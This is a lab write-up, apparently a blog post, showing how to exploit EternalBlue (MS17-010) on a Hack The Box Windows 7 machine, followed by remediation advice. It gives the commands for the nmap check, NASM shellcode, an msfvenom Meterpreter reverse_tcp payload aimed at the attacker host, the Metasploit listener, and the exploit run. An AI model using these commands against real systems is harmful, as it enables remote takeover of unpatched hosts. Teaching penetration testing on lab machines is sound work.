Attacking Windows Series

Chapter 01: Eternalblue

Introduction

Welcome to Chapter 01 of Attacking Windows by MarioManHacks. The objective of this series is to introduce beginner to intermediate level cyber security enthusiasts to the tools and techniques used in attacking a Windows environment. The techniques demonstrated in this write-up would also benefit security enthusiasts in Capture The Flag (CTF) challenges and real world network penetration tests.

The following write-up is a proof of concept (PoC) which simulates a real-world penetration test. It is therefore recommended that readers have a moderate level of understanding in the following subjects:

(If you need a refresher in any of the aforementioned subjects, we’ve linked a few (free) resources which should assist in getting you up to speed)

Overview

In this Chapter, we will explore the basic techniques used to identify and exploit a Common Vulnerability and Exposure (CVE) in Windows known as Eternalblue or MS17–010. For our PoC we will be attacking the machine named “Blue” hosted by Hack The Box (HTB).

Key Learning Outcomes

By the end of this chapter readers should understand how to:

Scan a target for open ports using a network port scanner

Enumerate services

Search for publicly available exploits

Manually exploit MS17–010

Exploiting Eternalblue

We have segregated our test into three phases, enumeration, exploitation and vulnerability analysis.

Enumeration Phase

Testing commences by running the following nmap scan to enumerate open ports and services on the target machine:

(Note that our target IP is 10.10.10.40 and our attacker machine IP is 10.10.16.66.)

As can be observed, SMB port 445 is open. Before proceeding we need to verify that the target is vulnerable to enternalblue. We achieve this by running the following nmap script:

nmap -p445 — script smb-vuln-ms17–010 10.10.10.40

As can be seen in the output, the script, reveals that the machine is likely to be vulnerable to MS17–010.

During the enumeration phase we manage to establish that the target is;

1) A Windows 7 machine

2) Port 445 is exposed and

3) The machines supports SMBv1 and is likely vulnerable.

With this information on hand we may now proceed to the exploitation phase.

Exploitation Phase 1: Generate The Payload

A quick searchsploit query reveals that there is a publicly available exploit for eternalblue.

After some Googling it was found that a custom exploit was available on github. (https://github.com/worawit/MS17-010) Before leveraging the exploit, we need to generate shellcode which consists of 2 components.

The first component being the Windows x64 shellcode.

We compile our kernel shellcode using the Netwide Assembler (NASM) installed on Kali Linux. NASM is a Linux based Assembler and diassambler for Intel x86 and x64 architecture. To use NASM open a terminal and simply type “nasm -f <some_data_here>”

In this instance we will use the following command to generate our shellcode:

nasm -f bin eternalblue_kshellcode_x64.asm -o win_x64-kernel.bin

We now have the output “win_x64-kernel.bin” and have successfully completed the first component of our payload.

The second component of our payload is the Meterpreter payload which will allow us to gain a reverse shell on our attacker machine once the exploit has been executed.

We create our payload using the msfvenom tool using the following command:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.16.66 lport=9900 exitfunc=thread -f raw -o win_x64-meterpreter.bin

This will give us our 2nd component “win_x64-meterpreter.bin”

Our final step is to now combine the 2 components of the payload. We achieve this by “catting” the 2 output files into 1 consolidated file using the following command:

cat win_x64-kernel.bin win_x64-meterpreter.bin > eternalblue_winx64.bin

We have now successfully generated our payload and can move onto the next phase of exploitation.

Exploitation Phase 1.2: Executing The Exploit

Now that we’ve successfully compiled our payload, the next step is to configure what is called a listener or multi handler which will be key in catching our reverse shell.

This is done using the Metasploit framework. Note that in some cases a simple nc listener would suffice however, as we’ve opted for the use of a meterpreter shell a multi handler would be more practical.

In a terminal run “msfconsole” and type the following command:

use exploit/multi/handler

Here, we will enter the relevant information to catch our reverse shell. As this is pretty straightforward, I have attached a screenshot of the final configuration:

Now for the part we’ve all been waiting for. Execute the exploit by running the following command:

python eternalblue_exploit7.py 10.10.10.40 eternalblue_winx64.bin

If all components were generated correctly we should get a reverse shell, as can be observed in the screenshot below:

Vulnerability Analysis

Often in penetration testing it is easy to become consumed by the excitement of exploiting something. Part of the process is to not only demonstrate impact but to also make recommendations in terms of remediation. Basically, how do we fix the problem?

In this section we will look at a vulnerability analysis of our target which will cover the following areas:

Root Cause Analysis

Risk

Impact

Remediation

Root Cause Analysis:

During testing it was discovered that the target system was configured with an outdated version of the Windows operating system (OS), being Windows 7. Windows 7 had reached end of life as of January 2020 and is therefore no longer supported by Microsoft.

Furthermore, it was found that the target system made use of SMB version 1 which is an outdated version of the SMB protocol. It was therefore determined that the route cause for exploitation was insufficient patch management and host hardening.

Risk Description:

Testing revealed that the target system was vulnerable to Eternalblue. This could allow a threat actor (a hacker) to gain full control of the host, using publicly known exploits. Risk was therefore determined to be of a Critical rating.

Eternalblue is an exploit which allows threat actors to execute remote arbitrary code and gain access to a Microsoft Windows system. It exploits a vulnerability in the Windows network file sharing protocol known as Server Message Block version 1 (SMBv1) which is responsible for access to remote files on a Windows system.

Vulnerability Impact:

During testing the target system was compromised through exploiting the Eternalblue vulnerability using publicly available exploits, as can be observed in the former section of this write-up. A threat actor could leverage this vulnerability and gain a foothold onto the underlying network. The threat actor could then pivot through the network while compromising a series of systems and gaining an elevated level of privileges within the Windows domain.

Recommendation:

It is advised that devices on the network running older instances of the Windows OS to be removed or upgraded to the latest supported version which, at the time of this write-up was Windows 10.

It is further advised where appropriate, to disable SMBv1 and make use of SMB versions 2 and 3.

Additionally, it is recommended to introduce a patch management policy which would address the issue of outdated software installed on the perimeter network. If a distribution of software is determined to be necessary, it is advised that the software is updated to the most recent, supported versions.

Further Reading:

https://docs.microsoft.com/en-us/windows-server/storage/file-server/troubleshoot/detect-enable-and-disable-smbv1-v2-v3